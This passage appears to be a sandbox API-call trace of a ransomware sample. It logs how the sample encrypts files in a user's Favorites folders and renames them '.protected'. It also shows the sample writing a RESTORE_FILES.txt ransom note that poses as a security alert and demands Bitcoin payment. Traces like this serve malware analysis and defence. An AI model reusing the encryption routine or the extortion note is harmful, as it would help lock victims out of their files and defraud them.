StrStrW (lpFirst="MSN.url", lpSrch=".rar") returned 0x0 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] StrStrW (lpFirst="MSN.url", lpSrch=".zip") returned 0x0 [0091.949] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.950] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.950] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, 
nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.950] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.951] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.951] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.951] CloseHandle (hObject=0xd4) returned 1 [0091.951] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.protected") returned 74 [0091.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.protected")) returned 1 [0091.952] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Windows") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files (x86)") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$Recycle.bin") returned 1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="System Volume Information") returned -1 
[0091.952] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.952] StrStrIW (lpFirst="MSNBC News.url", lpSrch=".protected") returned 0x0 [0091.952] lstrcmpW (lpString1="MSNBC News.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".rar") returned 0x0 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".zip") returned 0x0 [0091.954] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.954] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0091.954] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.955] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.955] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.956] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.956] CloseHandle (hObject=0xd4) returned 1 [0091.957] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.protected") returned 81 [0091.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.protected")) returned 1 [0091.958] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.958] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.958] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\RESTORE_FILES.txt") returned 74 [0091.958] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.958] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.958] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.959] lstrlenA (lpString="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") returned 684 [0091.959] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.959] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.959] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.959] CloseHandle (hObject=0xb4) returned 1 [0091.960] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Windows") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files (x86)") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="$Recycle.bin") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="System Volume Information") returned 1 [0091.960] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 56 [0091.960] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0091.960] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0091.960] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*") returned 58 [0091.960] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.961] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.961] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\.") returned 58 [0091.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.962] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\..") returned 59 [0091.962] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.962] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.962] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Windows") returned -1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files") returned -1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files (x86)") returned 
-1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.962] StrStrIW (lpFirst="Get Windows Live.url", lpSrch=".protected") returned 0x0 [0091.962] lstrcmpW (lpString1="Get Windows Live.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".rar") returned 0x0 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".zip") returned 0x0 [0091.963] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.966] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.966] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.966] CloseHandle (hObject=0xd4) returned 1 [0091.967] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.protected") returned 87 [0091.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.protected")) returned 1 [0091.967] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.967] lstrcmpiW 
(lpString1="Windows Live Gallery.url", lpString2="Windows") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files (x86)") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$Recycle.bin") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="System Volume Information") returned 1 [0091.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.968] StrStrIW (lpFirst="Windows Live Gallery.url", lpSrch=".protected") returned 0x0 [0091.968] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.968] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".rar") 
returned 0x0 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".zip") returned 0x0 [0091.970] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.971] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.971] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.971] CloseHandle (hObject=0xd4) returned 1 [0091.972] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.protected") returned 91 [0091.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.protected")) returned 1 [0091.973] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Windows") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files (x86)") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$Recycle.bin") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="System Volume Information") returned 1 [0091.973] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrIW (lpFirst="Windows Live Mail.url", lpSrch=".protected") returned 0x0 [0091.973] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.973] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.973] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".rar") returned 0x0 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.974] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".zip") returned 0x0 [0091.974] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.974] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.974] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.975] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.975] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.975] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.975] CloseHandle (hObject=0xd4) returned 1 [0091.975] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.protected") returned 88 [0091.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.protected")) returned 1 [0091.976] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Windows") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files (x86)") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$Recycle.bin") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="System Volume Information") returned 1 [0091.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 